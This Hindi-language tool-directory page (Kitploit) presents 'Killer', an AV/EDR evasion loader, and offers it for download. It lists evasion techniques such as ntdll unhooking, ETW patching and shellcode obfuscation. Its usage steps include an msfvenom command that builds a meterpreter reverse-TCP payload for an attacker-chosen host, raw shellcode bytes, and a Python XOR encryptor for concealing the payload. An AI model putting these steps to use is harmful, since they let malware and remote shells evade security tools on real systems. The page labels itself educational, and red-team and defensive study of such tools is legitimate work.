Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Killer — किलर एक बेहद सरल उपकरण है जिसे विभिन्न चोरी-छिपे तकनीकों का उपयोग करके AV/EDR सुरक्षा उपकरणों को बायपास करने के लिए डिज़ाइन किया गया है और इसका उपयोग पैचवर्क समूह द्वारा किया जाता है। | Kitploit
उपकरण/GitHubGitHub/0xhossam/killer
शोषणआईडीएस/आईपीएस से बचनाशेलकोडलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंटएंटी-बॉट
GitHub0xhossam/killer

Killer

किलर एक बेहद सरल उपकरण है जिसे विभिन्न चोरी-छिपे तकनीकों का उपयोग करके AV/EDR सुरक्षा उपकरणों को बायपास करने के लिए डिज़ाइन किया गया है और इसका उपयोग पैचवर्क समूह द्वारा किया जाता है।

रिपॉजिटरी देखें
84613572 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

किलर टूल (ईडीआर एवेज़न)

यह एक AV/EDR एवेज़न टूल है जो सीखने के लिए सुरक्षा टूलों को बायपास करने के लिए बनाया गया है, अब तक यह टूल FUD है।

विशेषताएँ:

  • मेमोरी स्कैनिंग एवेज़न के लिए मॉड्यूल स्टॉम्पिंग
  • ताज़ा ntdll कॉपी द्वारा DLL अनहुकिंग
  • IAT छुपाना और ऑबफस्केशन और API अनहुकिंग
  • कुछ सुरक्षा नियंत्रणों को बायपास करने के लिए ETW पैचिंग
  • शामिल सैंडबॉक्स एवेज़न तकनीकें और बुनियादी एंटी-डीबगिंग
  • XOR-ing द्वारा पूरी तरह से ऑबफस्केटेड (फंक्शन्स - कीज़ - शेलकोड)
  • शेलकोड उल्टा और एन्क्रिप्टेड
  • APIs का उपयोग किए बिना पेलोड को हॉलो मेमोरी में ले जाना
  • @cocomelonc द्वारा GetProcAddress और GetModuleHandle कार्यान्वयन
  • नया थ्रेड बनाए बिना चलता है और x64 और x86 आर्किटेक्चर को सपोर्ट करता है

इसका उपयोग कैसे करें

msfvenom टूल से अपना शेलकोड जनरेट करें:

root@kitploit:~
  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST<IP> LPORT<PORT> -f py
  

फिर आउटपुट को एन्क्रिप्टर XOR फंक्शन में कॉपी करें:

root@kitploit:~
    data = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

    key  = 0x50 # Put here your key as byte like for example (0x90 or 0x40 or 0x30) and more...

    print('{ ', end='')
    for i in data:
        print(hex(i ^ key), end=', ')

    print("0x0 };") # Notice that it adds one byte "0x0" to the end.

और फिर आप अपने डिक्रिप्शन फंक्शन को संभाल सकते हैं, यह स्क्रिप्ट किडीज़ के लिए आसान नहीं है ^-^, आप इसके बारे में मेरे लेख में और पढ़ सकते हैं:

  • Part 1 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5
  • Part 2 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354
  • Part 3 => https://medium.com/@0xHossam/unhooking-memory-object-hiding-3229b75618f7
  • Part 4 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-p-4-162662bb630e

चलाने पर यह परिणाम मिलता है:

image

PoC (प्रूफ-ऑफ-कॉन्सेप्ट) :

https://antiscan.me/images/result/07OkIKKhpRsG.png

image

महत्वपूर्ण नोट्स

  • सबसे पहले Abdallah Mohammed का धन्यवाद जिन्होंने इसे विकसित करने में मेरी मदद की ^_^
  • यह टूल केवल शैक्षिक उद्देश्यों के लिए है
  • कोड को विज़ुअल स्टूडियो कंपाइलर के साथ कंपाइल करें
टूल डाउनलोड करें